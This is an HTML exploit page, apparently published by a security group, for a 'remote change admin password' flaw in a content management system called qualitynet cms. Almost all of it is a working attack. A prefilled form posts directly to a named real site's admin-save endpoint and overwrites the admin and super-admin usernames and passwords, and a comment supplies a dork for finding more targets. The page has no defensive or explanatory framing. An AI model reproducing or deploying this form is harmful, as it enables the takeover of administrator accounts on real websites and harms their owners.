<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>coded by ahmadbady</title> <script language="JavaScript"> //=========================================================================== //( #Topic : qualitynet cms //( #Bug type : remote change admin password exploit //( #Advisory : http://www.qualitynet.co.il //=========================================================================== //( #Author : ItSecTeam //( #Email : Bug@ITSecTeam.com //( #Website: http://www.itsecteam.com //( #Forum : http://forum.ITSecTeam.com //( #dork : http://www.qualitynet.co.il/content_page_18.html //--------------------------------------------------------------------- </script> <form name="adminsForm" method="post" onsubmit="" action="http://www.eyeclick.com/site_admins.php?act=save" enctype="multipart/form-data" > <table align="center" width="316" > <tr> <td > Admin Username : &nbsp; </td> <td> <input type="text" class="txtField" name="user" value="admin" /> </td> </tr> <tr> <td > Admin Password : &nbsp; </td> <td> <input type="text" class="txtField" name="pass" value="12345678" /> </td> </tr> <tr> <td > Super Admin Username : &nbsp; </td> <td> <input type="text" class="txtField" name="adminuser" value="itsecteam" /> </td> </tr> <tr> <td > Super Admin Password : &nbsp; </td> <td> <input type="text" class="txtField" name="adminpass" value="12345678" /> </td> </tr> <tr> <td colspan="2" align="left" > <input type="submit" value="Save Details" class="btnSubmit" /> </td> </tr> </table> </form> </td> </tr> <tr bgcolor="#dcdcdc"> <td colspan="2" align="center" height="10"> </body> </html>